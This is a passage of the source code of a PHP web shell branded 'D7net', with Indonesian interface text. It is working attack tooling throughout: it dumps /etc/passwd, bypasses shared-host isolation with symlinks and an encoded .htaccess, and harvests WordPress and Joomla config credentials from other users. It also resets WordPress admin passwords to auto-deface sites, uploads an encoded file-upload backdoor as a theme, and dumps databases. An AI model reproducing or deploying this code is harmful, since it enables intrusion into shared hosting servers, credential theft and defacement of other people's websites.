  1246. echo"</textarea><br><br><b></b><br>";
  1247. }
  1248. if($_POST['shex'])
  1249. {
  1250. echo"<textarea class='inputz' cols='65' rows='15'>";
  1251. echo shell_exec("cat /etc/passwd");
  1252. echo"</textarea><br><br><b></b><br>";
  1253. }
  1254. echo '<center>';
  1255. if($_POST['melex'])
  1256. {
  1257. echo"<textarea class='inputz' cols='65' rows='15'>";
  1258. for($uid=0;$uid<60000;$uid++){
  1259. $ara = posix_getpwuid($uid);
  1260. if (!empty($ara)) {
  1261. while (list ($key, $val) = each($ara)){
  1262. print "$val:";
  1263. }
  1264. print "\n";
  1265. }
  1266. }
  1267. echo"</textarea><br><br>";
  1268. }
  1269. } elseif($_GET['D7net'] == 'jumping') {
  1270.     $i = 0;
  1271.     echo "<pre><div class='margin: 5px auto;'>";
  1272.     $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1273.     while($passwd = fgets($etc)) {
  1274.         if($passwd == '' || !$etc) {
  1275.             echo "<font color=red>Can't read /etc/passwd</font>";
  1276.         } else {
  1277.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1278.             foreach($user_jumping[1] as $user_d7net_jump) {
  1279.                 $user_jumping_dir = "/home/$user_d7net_jump/public_html";
  1280.                 if(is_readable($user_jumping_dir)) {
  1281.                     $i++;
  1282.                     $jrw = "[<font color=white>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1283.                     if(is_writable($user_jumping_dir)) {
  1284.                         $jrw = "[<font color=white>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1285.                     }
  1286.                     echo $jrw;
  1287.                     if(function_exists('posix_getpwuid')) {
  1288.                         $domain_jump = file_get_contents("/etc/named.conf");   
  1289.                         if($domain_jump == '') {
  1290.                             echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1291.                         } else {
  1292.                             preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1293.                             foreach($domains_jump[1] as $dj) {
  1294.                                 $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1295.                                 $user_jumping_url = $user_jumping_url['name'];
  1296.                                 if($user_jumping_url == $user_d7net_jump) {
  1297.                                     echo " => ( <u>$dj</u> )<br>";
  1298.                                     break;
  1299.                                 }
  1300.                             }
  1301.                         }
  1302.                     } else {
  1303.                         echo "<br>";
  1304.                     }
  1305.                 }
  1306.             }
  1307.         }
  1308.     }
  1309.     if($i == 0) {
  1310.     } else {
  1311.         echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  1312.     }
  1313.     echo "</div></pre>";
  1314. } elseif($_GET['D7net'] == 'vhosts'){
  1315.     echo "<form method='POST' action=''>";
  1316.     echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
  1317.     echo "<center><input type='submit' class='d7net_table' value='Bypass it' name='Colii'></center>";
  1318.         if (isset($_POST['Colii'])){
  1319.                         mkdir('symvhosts', 0755);
  1320.                         chdir('symvhosts');
  1321.                         system('ln -s / d7net.txt');
  1322.             $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
  1323.             $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","d7net.txt");
  1324.             $rt="<br><a href=symvhosts/d7net.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
  1325.     Bypassed Successfully</b></font></a>";
  1326.     echo "<br><br><b>Done !</b><br><br>Check link given below for / folder symlink <br>$rt<br>Note: Apabila Forbidden pas buka /var/www/vhosts/Domain.com/ harap tambahkan httpdocs ex:/var/www/vhosts/Domain.com/httpdocs/</center>";} echo "</form>";
  1327.  
  1328. } elseif($_GET['D7net'] == 'adminer') {
  1329.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1330.     function adminer($url, $isi) {
  1331.         $fp = fopen($isi, "w");
  1332.         $ch = curl_init();
  1333.               curl_setopt($ch, CURLOPT_URL, $url);
  1334.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1335.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1336.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1337.               curl_setopt($ch, CURLOPT_FILE, $fp);
  1338.         return curl_exec($ch);
  1339.               curl_close($ch);
  1340.         fclose($fp);
  1341.         ob_flush();
  1342.         flush();
  1343.     }
  1344.     if(file_exists('adminer.php')) {
  1345.         echo "<center><font color=yellow><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1346.     } else {
  1347.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1348.             echo "<center><font color=yellow><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1349.         } else {
  1350.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  1351.         }
  1352.     }
  1353. } elseif($_GET['D7net'] == 'auto_dwp') {
  1354.     if($_POST['auto_deface_wp']) {
  1355.         function anucurl($sites) {
  1356.             $ch = curl_init($sites);
  1357.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1358.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1359.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1360.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1361.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1362.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1363.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1364.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1365.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1366.             $data = curl_exec($ch);
  1367.                   curl_close($ch);
  1368.             return $data;
  1369.         }
  1370.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1371.             $post = array(
  1372.                    "log" => "$userr",
  1373.                    "pwd" => "$pass",
  1374.                    "rememberme" => "forever",
  1375.                    "wp-submit" => "$wp_submit",
  1376.                    "redirect_to" => "$web",
  1377.                    "testcookie" => "1",
  1378.                    );
  1379.             $ch = curl_init($cek);
  1380.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1381.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1382.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1383.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1384.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1385.                   curl_setopt($ch, CURLOPT_POST, 1);
  1386.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1387.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1388.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1389.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1390.             $data = curl_exec($ch);
  1391.                   curl_close($ch);
  1392.             return $data;
  1393.         }
  1394.         $scan = $_POST['link_config'];
  1395.         $link_config = scandir($scan);
  1396.         $script = htmlspecialchars($_POST['script']);
  1397.         $user = "indoxploit";
  1398.         $pass = "indoxploit";
  1399.         $passx = md5($pass);
  1400.         foreach($link_config as $dir_config) {
  1401.             if(!is_file("$scan/$dir_config")) continue;
  1402.             $config = file_get_contents("$scan/$dir_config");
  1403.             if(preg_match("/WordPress/", $config)) {
  1404.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  1405.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  1406.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1407.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  1408.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1409.                 $prefix = $dbprefix."users";
  1410.                 $option = $dbprefix."options";
  1411.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1412.                 $db = mysql_select_db($dbname);
  1413.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1414.                 $result = mysql_fetch_array($q);
  1415.                 $id = $result[ID];
  1416.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1417.                 $result2 = mysql_fetch_array($q2);
  1418.                 $target = $result2[option_value];
  1419.                 if($target == '') {                
  1420.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1421.                 } else {
  1422.                     echo "[+] $target <br>";
  1423.                 }
  1424.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1425.                 if(!$conn OR !$db OR !$update) {
  1426.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1427.                     mysql_close($conn);
  1428.                 } else {
  1429.                     $site = "$target/wp-login.php";
  1430.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  1431.                     $b1 = anucurl($site2);
  1432.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1433.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1434.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1435.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1436.                     $www = "m.php";
  1437.                     $fp5 = fopen($www,"w");
  1438.                     fputs($fp5,$upload3);
  1439.                     $post2 = array(
  1440.                             "_wpnonce" => "$anu2",
  1441.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1442.                             "themezip" => "@$www",
  1443.                             "install-theme-submit" => "Install Now",
  1444.                             );
  1445.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1446.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1447.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1448.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1449.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1450.                           curl_setopt($ch, CURLOPT_POST, 1);
  1451.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1452.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1453.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1454.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1455.                     $data3 = curl_exec($ch);
  1456.                           curl_close($ch);
  1457.                     $y = date("Y");
  1458.                     $m = date("m");
  1459.                     $namafile = "id.php";
  1460.                     $fpi = fopen($namafile,"w");
  1461.                     fputs($fpi,$script);
  1462.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1463.                            curl_setopt($ch6, CURLOPT_POST, true);
  1464.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1465.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1466.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1467.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1468.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1469.                     $postResult = curl_exec($ch6);
  1470.                            curl_close($ch6);
  1471.                     $as = "$target/k.php";
  1472.                     $bs = anucurl($as);
  1473.                     if(preg_match("#$script#is", $bs)) {
  1474.                         echo "[+] <font color='yellow'>berhasil mepes...</font><br>";
  1475.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1476.                         } else {
  1477.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  1478.                         echo "[!!] coba aja manual: <br>";
  1479.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1480.                         echo "[+] username: <font color=yellow>$user</font><br>";
  1481.                         echo "[+] password: <font color=yellow>$pass</font><br><br>";    
  1482.                         }
  1483.                     mysql_close($conn);
  1484.                 }
  1485.             }
  1486.         }
  1487.     } else {
  1488.         echo "<center><h1>WordPress Auto Deface</h1>
  1489.         <form method='post'>
  1490.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1491.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by Desktop77N3T' required><br>
  1492.         <input type='submit' class='d7net_table' style='width: 450px;' name='auto_deface_wp' value='Sikatt!'>
  1493.         </form>
  1494.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1495.         </center>";
  1496.     }
  1497. }
  1498. elseif($_GET['D7net'] == 'zip') {
  1499.     echo "<center><h1>Zip Menu</h1>";
  1500. function rmdir_recursive($dir) {
  1501.     foreach(scandir($dir) as $file) {
  1502.        if ('.' === $file || '..' === $file) continue;
  1503.        if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  1504.        else unlink("$dir/$file");
  1505.    }
  1506.    rmdir($dir);
  1507. }
  1508. if($_FILES["zip_file"]["name"]) {
  1509.     $filename = $_FILES["zip_file"]["name"];
  1510.     $source = $_FILES["zip_file"]["tmp_name"];
  1511.     $type = $_FILES["zip_file"]["type"];
  1512.     $name = explode(".", $filename);
  1513.     $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  1514.     foreach($accepted_types as $mime_type) {
  1515.         if($mime_type == $type) {
  1516.             $okay = true;
  1517.             break;
  1518.         }
  1519.     }
  1520.     $continue = strtolower($name[1]) == 'zip' ? true : false;
  1521.     if(!$continue) {
  1522.         $message = "Itu Bukan Zip  , , GOBLOK SIA";
  1523.     }
  1524.   $path = dirname(__FILE__).'/';
  1525.   $filenoext = basename ($filename, '.zip');
  1526.   $filenoext = basename ($filenoext, '.ZIP');
  1527.   $targetdir = $path . $filenoext;
  1528.   $targetzip = $path . $filename;
  1529.   if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
  1530.   mkdir($targetdir, 0777);
  1531.     if(move_uploaded_file($source, $targetzip)) {
  1532.         $zip = new ZipArchive();
  1533.         $x = $zip->open($targetzip);
  1534.         if ($x === true) {
  1535.             $zip->extractTo($targetdir);
  1536.             $zip->close();
  1537.  
  1538.             unlink($targetzip);
  1539.         }
  1540.         $message = "<b>Sukses Gan :)</b>";
  1541.     } else {   
  1542.         $message = "<b>Error Gan :(</b>";
  1543.     }
  1544. }  
  1545. echo '<table style="width:100%" border="1">
  1546.   <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  1547. <label>Zip File : <input type="file" name="zip_file" /></label>
  1548. <input type="submit" name="submit" value="Upload And Unzip" />
  1549. </form>';
  1550. if($message) echo "<p>$message</p>";
  1551. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";  
  1552.     if($_POST['backup']){
  1553.     $save=$_POST['save'];
  1554.     function Zip($source, $destination)
  1555. {
  1556.     if (extension_loaded('zip') === true)
  1557.     {
  1558.         if (file_exists($source) === true)
  1559.         {
  1560.             $zip = new ZipArchive();
  1561.  
  1562.             if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1563.             {
  1564.                 $source = realpath($source);
  1565.  
  1566.                 if (is_dir($source) === true)
  1567.                 {
  1568.                     $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1569.  
  1570.                     foreach ($files as $file)
  1571.                     {
  1572.                         $file = realpath($file);
  1573.  
  1574.                         if (is_dir($file) === true)
  1575.                         {
  1576.                             $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1577.                         }
  1578.  
  1579.                         else if (is_file($file) === true)
  1580.                         {
  1581.                             $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1582.                         }
  1583.                     }
  1584.                 }
  1585.  
  1586.                 else if (is_file($source) === true)
  1587.                 {
  1588.                     $zip->addFromString(basename($source), file_get_contents($source));
  1589.                 }
  1590.             }
  1591.  
  1592.             return $zip->close();
  1593.         }
  1594.     }
  1595.  
  1596.     return false;
  1597. }
  1598.     Zip($_POST['dir'],$save);
  1599.     echo "Done , Save To <b>$save</b>";
  1600.     }
  1601. } elseif($_GET['D7net'] == 'dbdump')
  1602.     {
  1603. echo $head.'<p align="center">';
  1604. echo '
  1605. <form action method=post>
  1606. <table width=371 class=tabnet >
  1607. <tr><th colspan="2">Database Dump</th></tr>
  1608. <tr>
  1609.     <td>Server </td>
  1610.     <td><input class="inputz" type=text name=server size=52></td></tr><tr>
  1611.     <td>Username</td>
  1612.     <td><input class="inputz" type=text name=username size=52></td></tr><tr>
  1613.     <td>Password</td>
  1614.     <td><input class="inputz" type=text name=password size=52></td></tr><tr>
  1615.     <td>DataBase Name</td>
  1616.     <td><input class="inputz" type=text name=dbname size=52></td></tr>
  1617.     <tr>
  1618.     <td>DB Type </td>
  1619.     <td><form method=post action="'.$me.'">
  1620.     <select class="inputz" name=method>
  1621.         <option  value="gzip">Gzip</option>
  1622.         <option value="sql">Sql</option>
  1623.         </select>
  1624.     <input class="inputzbut" type=submit value="  Dump!  " ></td></tr>
  1625.     </form></center></table>';
  1626. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
  1627. $date = date("Y-m-d");
  1628. $dbserver = $_POST['server'];
  1629. $dbuser = $_POST['username'];
  1630. $dbpass = $_POST['password'];
  1631. $dbname = $_POST['dbname'];
  1632. $file = "Dump-$dbname-$date";
  1633. $method = $_POST['method'];
  1634. if ($method=='sql'){
  1635. $file="Dump-$dbname-$date.sql";
  1636. $fp=fopen($file,"w");
  1637. }else{
  1638. $file="Dump-$dbname-$date.sql.gz";
  1639. $fp = gzopen($file,"w");
  1640. }
  1641. function write($data) {
  1642. global $fp;
  1643. if ($_POST['method']=='ssql'){
  1644. fwrite($fp,$data);
  1645. }else{
  1646. gzwrite($fp, $data);
  1647. }}
  1648. mysql_connect ($dbserver, $dbuser, $dbpass);
  1649. mysql_select_db($dbname);
  1650. $tables = mysql_query ("SHOW TABLES");
  1651. while ($i = mysql_fetch_array($tables)) {
  1652.     $i = $i['Tables_in_'.$dbname];
  1653.     $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  1654.     write($create['Create Table'].";nn");
  1655.     $sql = mysql_query ("SELECT * FROM ".$i);
  1656.     if (mysql_num_rows($sql)) {
  1657.         while ($row = mysql_fetch_row($sql)) {
  1658.             foreach ($row as $j => $k) {
  1659.                 $row[$j] = "'".mysql_escape_string($k)."'";
  1660.             }
  1661.             write("INSERT INTO $i VALUES(".implode(",", $row).");n");
  1662.         }
  1663.     }
  1664. }
  1665. if ($method=='ssql'){
  1666. fclose ($fp);
  1667. }else{
  1668. gzclose($fp);}
  1669. header("Content-Disposition: attachment; filename=" . $file);  
  1670. header("Content-Type: application/download");
  1671. header("Content-Length: " . filesize($file));
  1672. flush();
  1673.  
  1674. $fp = fopen($file, "r");
  1675. while (!feof($fp))
  1676. {
  1677.     echo fread($fp, 65536);
  1678.     flush();
  1679. }
  1680. fclose($fp);
  1681. }
  1682. } elseif($_GET['D7net'] == 'csrfexploit')
  1683. {  
  1684. echo '<html>
  1685. <center><h1 style="font-size:33px;">CSRF Exploiter</h1><br><br>
  1686. <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
  1687. <br><br>
  1688. <form method="post" style="font-size:25px;">
  1689. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  1690. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  1691. <input type="submit" name="d" value="Lock!">
  1692. </form>';
  1693. $url = $_POST["url"];
  1694. $pf = $_POST["pf"];
  1695. $d = $_POST["d"];
  1696. if($d) {
  1697.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
  1698. </html>";
  1699. }
  1700. } elseif($_GET['D7net'] == 'auto_wp') {
  1701.     if($_POST['hajar']) {
  1702.         $title = htmlspecialchars($_POST['new_title']);
  1703.         $pn_title = str_replace(" ", "-", $title);
  1704.         if($_POST['cek_edit'] == "Y") {
  1705.             $script = $_POST['edit_content'];
  1706.         } else {
  1707.             $script = $title;
  1708.         }
  1709.         $conf = $_POST['config_dir'];
  1710.         $scan_conf = scandir($conf);
  1711.         foreach($scan_conf as $file_conf) {
  1712.             if(!is_file("$conf/$file_conf")) continue;
  1713.             $config = file_get_contents("$conf/$file_conf");
  1714.             if(preg_match("/WordPress/", $config)) {
  1715.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  1716.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  1717.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1718.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  1719.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1720.                 $prefix = $dbprefix."posts";
  1721.                 $option = $dbprefix."options";
  1722.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1723.                 $db = mysql_select_db($dbname);
  1724.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1725.                 $result = mysql_fetch_array($q);
  1726.                 $id = $result[ID];
  1727.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1728.                 $result2 = mysql_fetch_array($q2);
  1729.                 $target = $result2[option_value];
  1730.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1731.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1732.                 echo "<div style='margin: 5px auto;'>";
  1733.                 if($target == '') {
  1734.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1735.                 } else {
  1736.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1737.                 }
  1738.                 if(!$update OR !$conn OR !$db) {
  1739.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1740.                 } else {
  1741.                     echo "<font color=lime>sukses di ganti.</font><br>";
  1742.                 }
  1743.                 echo "</div>";
  1744.                 mysql_close($conn);
  1745.             }
  1746.         }
  1747.     } else {
  1748.         echo "<center>
  1749.         <h1>Auto Edit Title+Content WordPress</h1>
  1750.         <form method='post'>
  1751.         DIR Config: <br>
  1752.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1753.         Set Title: <br>
  1754.         <input type='text' name='new_title' value='Hacked By Desktop77N3T' placeholder='New Title'><br><br>
  1755.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1756.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1757.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1758.         <input type='submit' class='d7net_table' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1759.         </form>
  1760.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1761.         ";
  1762.     }
  1763. } elseif($_GET['D7net'] == 'removeshell') {
  1764.     if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  1765.             die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  1766.         else
  1767.             echo '<center>unlink failed!</center>';
  1768. } elseif($_GET['D7net'] == 'grabconfig') {
  1769. echo "
  1770. <head>
  1771. <link rel='icon' type='image/ico' href='http://www.haurgeulis-security.com/favicon.ico/>
  1772. <form method='POST'>
  1773. </head>
  1774. <style>
  1775. textarea {
  1776. resize:none;
  1777. color: #1975FF ;
  1778. border:1px solid white ;
  1779. border-left: 4px solid white ;
  1780. }
  1781. input {
  1782. color: #FF0000;
  1783. border:1px dotted white;
  1784. }
  1785. </style>";
  1786. echo "<br><center><span style='font-size:30px;'>Config Grabber</span>";?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="#FF0000" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='area' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='d7net_table' size="100" value="Grab Now" type="submit"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink is disabled :( </error>');}@mkdir('d7net_grab', 0755);@chdir('d7net_grab');
  1787. $htaccess="
  1788. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  1789. Options Indexes FollowSymLinks
  1790. ForceType text/plain
  1791. AddType text/plain .php
  1792. AddType text/plain .html
  1793. AddType text/html .shtml
  1794. AddType txt .php
  1795. AddHandler server-parsed .php
  1796. AddHandler txt .php
  1797. AddHandler txt .html
  1798. AddHandler txt .shtml
  1799. Options All
  1800. Options All";
  1801. file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];$passwd=explode("n",$passwd);echo "<br><br><center><font color=#b0b000 size=2pt>wait ...</center><br>";foreach($passwd as $pwd){$pawd=explode(":",$pwd);$user =$pawd[0];@symlink('/home/'.$user.'/public_html/application/config/database.php',$user.'-config2.txt');@symlink('/home/'.$user.'/public_html/application/database/config.php',$user.'-config3.txt');@symlink('/home/'.$user.'/public_html/system/config/database.php',$user.'-config4.txt');@symlink('/home/'.$user.'/public_html/system/config.php',$user.'-config5.txt');@symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-config6.txt');@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');@symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');@symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.t